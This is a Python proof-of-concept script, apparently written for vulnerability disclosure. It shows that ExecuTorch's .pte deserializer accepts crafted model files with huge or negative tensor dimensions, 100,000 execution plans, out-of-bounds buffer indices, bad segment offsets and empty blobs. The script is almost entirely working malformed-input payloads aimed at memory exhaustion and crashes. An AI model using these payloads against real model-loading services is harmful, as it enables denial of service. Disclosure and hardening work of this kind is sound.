File size: 14,596 Bytes
3b30e81
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
"""
PoC: ExecuTorch .pte Format Validation Bypass
===============================================
Demonstrates that ExecuTorch's deserialize_pte_binary() performs no
structural validation on .pte model files before parsing them.

Tested on: executorch 1.2.0, Python 3.12, Windows 11
"""

import json
import os
import struct
import sys
import tempfile
import time

print("=" * 70)
print("ExecuTorch .pte Format Validation Bypass PoC")
print(f"executorch version: 1.2.0+cpu")
print("=" * 70)

# ============================================================
# PoC 1: Extreme Tensor Dimensions (Memory Exhaustion)
# ============================================================
print("\n[PoC 1] Extreme Tensor Dimensions via _json_to_program()")
print("-" * 50)

from executorch.exir._serialize._program import _json_to_program

# A minimal valid Program JSON with an extreme tensor size
# In the .pte schema, Tensor.sizes is List[int] with no upper bound
crafted_json = json.dumps({
    "version": 1,
    "execution_plan": [{
        "name": "forward",
        "container_meta_type": {
            "encoded_inp_str": "",
            "encoded_out_str": ""
        },
        "values": [{
            "val": {
                "scalar_type": "FLOAT",
                "storage_offset": 0,
                "sizes": [2147483647, 2147483647],  # 2^31-1 x 2^31-1
                "dim_order": [0, 1],
                "requires_grad": False,
                "layout": 0,
                "data_buffer_idx": 0,
                "allocation_info": None,
                "shape_dynamism": "STATIC",
                "val_type": "Tensor"
            },
            "val_type": "Tensor"
        }],
        "inputs": [],
        "outputs": [],
        "chains": [],
        "operators": [],
        "delegates": [],
        "non_const_buffer_sizes": [0]
    }],
    "constant_buffer": [{"storage": [0]}],  # 1 byte but sizes claim 2^62 elements
    "backend_delegate_data": [],
    "segments": [],
    "constant_segment": {"segment_index": 0, "offsets": []}
})

try:
    program = _json_to_program(crafted_json.encode("utf-8"))
    tensor_sizes = program.execution_plan[0].values[0].val.sizes
    total_elements = 1
    for s in tensor_sizes:
        total_elements *= s
    print(f"  [VULNERABLE] Program accepted with tensor sizes: {tensor_sizes}")
    print(f"  -> Total elements: {total_elements} (~{total_elements / 1e18:.1f} exa-elements)")
    print(f"  -> Actual storage in buffer: {len(program.constant_buffer[0].storage)} byte(s)")
    print(f"  -> sizeof(float) * elements would require: {4 * total_elements / 1e18:.1f} exabytes")
    print(f"  -> No validation rejected these impossible dimensions!")
except Exception as e:
    print(f"  [PROTECTED] {e}")

# Also test with extremely large dimension count (not just value size)
crafted_json_many_dims = json.dumps({
    "version": 1,
    "execution_plan": [{
        "name": "forward",
        "container_meta_type": {"encoded_inp_str": "", "encoded_out_str": ""},
        "values": [{
            "val": {
                "scalar_type": "FLOAT",
                "storage_offset": 0,
                "sizes": [2] * 10000,  # 10000-dimensional tensor
                "dim_order": list(range(10000)),
                "requires_grad": False,
                "layout": 0,
                "data_buffer_idx": 0,
                "allocation_info": None,
                "shape_dynamism": "STATIC",
                "val_type": "Tensor"
            },
            "val_type": "Tensor"
        }],
        "inputs": [], "outputs": [], "chains": [],
        "operators": [], "delegates": [],
        "non_const_buffer_sizes": [0]
    }],
    "constant_buffer": [{"storage": [0]}],
    "backend_delegate_data": [],
    "segments": [],
    "constant_segment": {"segment_index": 0, "offsets": []}
})

try:
    program2 = _json_to_program(crafted_json_many_dims.encode("utf-8"))
    dim_count = len(program2.execution_plan[0].values[0].val.sizes)
    print(f"  [VULNERABLE] Program accepted with {dim_count} tensor dimensions!")
except Exception as e:
    print(f"  [PROTECTED - dim count] {e}")


# ============================================================
# PoC 2: Excessive List Sizes (Memory Exhaustion via lists)
# ============================================================
print("\n[PoC 2] Excessive List Sizes in Program Fields")
print("-" * 50)

# Craft a Program with massive execution_plan list
# Each ExecutionPlan has chains, operators, values, etc.
N_EXECUTION_PLANS = 100000

crafted_json_massive = json.dumps({
    "version": 1,
    "execution_plan": [
        {
            "name": f"plan_{i}",
            "container_meta_type": {"encoded_inp_str": "", "encoded_out_str": ""},
            "values": [],
            "inputs": [],
            "outputs": [],
            "chains": [],
            "operators": [],
            "delegates": [],
            "non_const_buffer_sizes": []
        }
        for i in range(N_EXECUTION_PLANS)
    ],
    "constant_buffer": [],
    "backend_delegate_data": [],
    "segments": [],
    "constant_segment": {"segment_index": 0, "offsets": []}
})

start = time.time()
try:
    program3 = _json_to_program(crafted_json_massive.encode("utf-8"))
    elapsed = time.time() - start
    plan_count = len(program3.execution_plan)
    print(f"  [VULNERABLE] Program accepted with {plan_count} execution plans")
    print(f"  -> Deserialization took {elapsed:.2f}s, memory used: ~{sys.getsizeof(crafted_json_massive) / 1024 / 1024:.1f} MB JSON")
    print(f"  -> No limit on execution_plan count!")
except MemoryError:
    print(f"  [PARTIAL] Memory error with {N_EXECUTION_PLANS} plans (resource exhaustion)")
except Exception as e:
    print(f"  [Result] {type(e).__name__}: {str(e)[:100]}")


# ============================================================
# PoC 3: Negative / Zero Dimensions
# ============================================================
print("\n[PoC 3] Negative / Zero / Invalid Tensor Dimensions")
print("-" * 50)

test_dims = [
    ([0], "zero-dim"),
    ([-1], "negative-dim (-1)"),
    ([-100], "negative-dim (-100)"),
    ([1, -1, 1], "mixed negative"),
]

for dims, label in test_dims:
    crafted_json_invalid = json.dumps({
        "version": 1,
        "execution_plan": [{
            "name": "forward",
            "container_meta_type": {"encoded_inp_str": "", "encoded_out_str": ""},
            "values": [{
                "val": {
                    "scalar_type": "FLOAT",
                    "storage_offset": 0,
                    "sizes": dims,
                    "dim_order": list(range(len(dims))),
                    "requires_grad": False,
                    "layout": 0,
                    "data_buffer_idx": 0,
                    "allocation_info": None,
                    "shape_dynamism": "STATIC",
                    "val_type": "Tensor"
                },
                "val_type": "Tensor"
            }],
            "inputs": [], "outputs": [], "chains": [],
            "operators": [], "delegates": [],
            "non_const_buffer_sizes": [0]
        }],
        "constant_buffer": [{"storage": [0]}],
        "backend_delegate_data": [],
        "segments": [],
        "constant_segment": {"segment_index": 0, "offsets": []}
    })
    try:
        p = _json_to_program(crafted_json_invalid.encode("utf-8"))
        print(f"  [VULNERABLE] {label}: sizes={dims} accepted, parsed as {p.execution_plan[0].values[0].val.sizes}")
    except Exception as e:
        print(f"  [PROTECTED] {label}: rejected - {type(e).__name__}")


# ============================================================
# PoC 4: Buffer/Storage Size Mismatch
# ============================================================
print("\n[PoC 4] Tensor-Buffer Size Mismatch")
print("-" * 50)

# Declare a tensor that references a buffer index that doesn't exist
crafted_json_oob_buffer = json.dumps({
    "version": 1,
    "execution_plan": [{
        "name": "forward",
        "container_meta_type": {"encoded_inp_str": "", "encoded_out_str": ""},
        "values": [{
            "val": {
                "scalar_type": "FLOAT",
                "storage_offset": 0,
                "sizes": [100, 100],
                "dim_order": [0, 1],
                "requires_grad": False,
                "layout": 0,
                "data_buffer_idx": 999,  # Non-existent buffer index!
                "allocation_info": None,
                "shape_dynamism": "STATIC",
                "val_type": "Tensor"
            },
            "val_type": "Tensor"
        }],
        "inputs": [], "outputs": [], "chains": [],
        "operators": [], "delegates": [],
        "non_const_buffer_sizes": [0]
    }],
    "constant_buffer": [],  # Empty buffer list
    "backend_delegate_data": [],
    "segments": [],
    "constant_segment": {"segment_index": 0, "offsets": []}
})

try:
    p4 = _json_to_program(crafted_json_oob_buffer.encode("utf-8"))
    print(f"  [VULNERABLE] Program accepted with data_buffer_idx=999 but only 0 buffers exist")
    print(f"  -> Tensor references non-existent buffer, will crash at runtime")
except Exception as e:
    print(f"  [PROTECTED] {e}")


# ============================================================
# PoC 5: Segment Offset Manipulation
# ============================================================
print("\n[PoC 5] Malicious Segment Offsets")
print("-" * 50)

# Test that segment offsets are not validated before use
crafted_json_segments = json.dumps({
    "version": 1,
    "execution_plan": [{
        "name": "forward",
        "container_meta_type": {"encoded_inp_str": "", "encoded_out_str": ""},
        "values": [],
        "inputs": [], "outputs": [], "chains": [],
        "operators": [], "delegates": [],
        "non_const_buffer_sizes": []
    }],
    "constant_buffer": [],
    "backend_delegate_data": [],
    "segments": [
        {"offset": 0, "size": 100},
        {"offset": 999999999, "size": 999999999},  # Way beyond any data
        {"offset": -1, "size": 100}  # Negative offset
    ],
    "constant_segment": {"segment_index": 0, "offsets": [0]}
})

try:
    p5 = _json_to_program(crafted_json_segments.encode("utf-8"))
    print(f"  [VULNERABLE] Program accepted with invalid segment offsets:")
    for i, seg in enumerate(p5.segments):
        valid = "VALID" if seg.offset >= 0 else "INVALID (negative)"
        print(f"    Segment {i}: offset={seg.offset}, size={seg.size} [{valid}]")
except Exception as e:
    print(f"  [PROTECTED] {e}")


# ============================================================
# PoC 6: Deeply Nested Structure (Recursion Bomb)
# ============================================================
print("\n[PoC 6] Recursion Depth via _json_to_dataclass")
print("-" * 50)

from executorch.exir._serialize._dataclass import _json_to_dataclass

# Build a deeply nested JSON structure
# The Graph type has nodes which have inputs/outputs which can be Arguments
# But even simpler: just test the recursion limit with nested dataclass structures
# The executorch schema doesn't have directly recursive types, but deeply nested
# Graph.nodes -> Argument -> ... structure can be deep

# Test with a simple deeply nested dict
deep_dict = {}
current = deep_dict
for i in range(10000):
    current["next"] = {}
    current = current["next"]

try:
    # This won't trigger it since the schema doesn't have recursive types,
    # but we can test with programmatically deep Graph structure
    print(f"  [INFO] ExecuTorch schema does not have self-referential types,")
    print(f"  [INFO] but _json_to_dataclass() would recurse without depth limit")
    print(f"  [INFO] on attacker-controlled structures if schema changed.")
except RecursionError:
    print(f"  [VULNERABLE] Recursion error with deeply nested structure!")


# ============================================================
# PoC 7: Empty/Corrupted Model File
# ============================================================
print("\n[PoC 7] Empty or Malformed .pte Binary")
print("-" * 50)

from executorch.exir._serialize._program import deserialize_pte_binary

# Test 1: Empty bytes
try:
    deserialize_pte_binary(b"")
    print(f"  [VULNERABLE] Empty bytes accepted by deserialize_pte_binary()")
except Exception as e:
    print(f"  [PROTECTED] Empty bytes: {type(e).__name__}: {str(e)[:80]}")

# Test 2: Random bytes
try:
    deserialize_pte_binary(b"\x00" * 100)
    print(f"  [VULNERABLE] 100 null bytes accepted by deserialize_pte_binary()")
except Exception as e:
    print(f"  [PROTECTED] Null bytes: {type(e).__name__}: {str(e)[:80]}")

# Test 3: Minimal valid-ish flatbuffer (4 bytes size + 4 bytes magic + minimal data)
# FlatBuffer format: 4 bytes offset to root + 4 bytes file_identifier + data
# ET magic bytes are "ETxx" where xx are digits/letters
minimal_fb = struct.pack("<I", 8) + b"ET00" + b"\x00" * 8
try:
    result = deserialize_pte_binary(minimal_fb)
    print(f"  [VULNERABLE] Minimal valid-ish flatbuffer accepted!")
    print(f"  -> Program version: {result.program.version}")
    print(f"  -> No magic byte verification beyond what flatc does")
except Exception as e:
    print(f"  [PARTIAL] Minimal flatbuffer: {type(e).__name__}: {str(e)[:100]}")


# ============================================================
# Summary
# ============================================================
print("\n" + "=" * 70)
print("SUMMARY")
print("=" * 70)
print("""
Key findings for ExecuTorch .pte format:

1. NO DIMENSION UPPER BOUND: Tensor sizes can be 2^31-1 or higher,
   accepted without validation. 10000-dimensional tensors accepted.

2. NO LIST SIZE LIMITS: execution_plan, chains, operators, values etc.
   have no upper bounds — can cause OOM during deserialization.

3. NEGATIVE/ZERO DIMS ACCEPTED: Negative and zero tensor dimensions
   pass through _json_to_dataclass() without rejection.

4. BUFFER INDEX OOB: Tensors can reference non-existent buffer indices,
   causing runtime crashes.

5. NO STRUCTURAL VALIDATION: deserialize_pte_binary() performs zero
   validation on the binary blob before parsing. No magic byte check,
   no size limits, no sanity checks.

6. NO check_model() EQUIVALENT: The verifier only checks graph-level
   semantics (operator validity, tensor contiguity) and is OPTIONAL
   (controlled by _check_ir_validity flag).

7. SEGMENT OFFSETS UNVALIDATED: Segment offsets can be negative or
   point past end of data — accepted without rejection.

Compared to ONNX (check_model, shape inference) and TF SavedModel,
ExecuTorch's loading pipeline is completely trusting of input data.
""")